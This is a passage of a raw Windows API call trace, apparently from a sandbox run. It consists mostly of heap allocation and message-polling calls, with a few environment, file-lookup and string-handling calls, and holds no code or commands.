(HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.424] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0252.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0252.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0252.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0252.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0252.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0252.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0252.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0252.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0252.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0252.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0252.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0252.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0252.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0252.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0252.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0252.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0252.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0252.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0252.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0252.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.524] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0252.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.526] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/SWfcb.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d8da40, ftCreationTime.dwHighDateTime=0x1d5eaf2, ftLastAccessTime.dwLowDateTime=0xa8a18d0, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xa8a18d0, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x14f18, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="SWfcb.jpg", cAlternateFileName="")) returned 0xa872d0 [0252.528] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0252.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.530] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0252.530] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0252.530] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0252.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0252.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.531] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0252.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0252.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0252.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0252.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 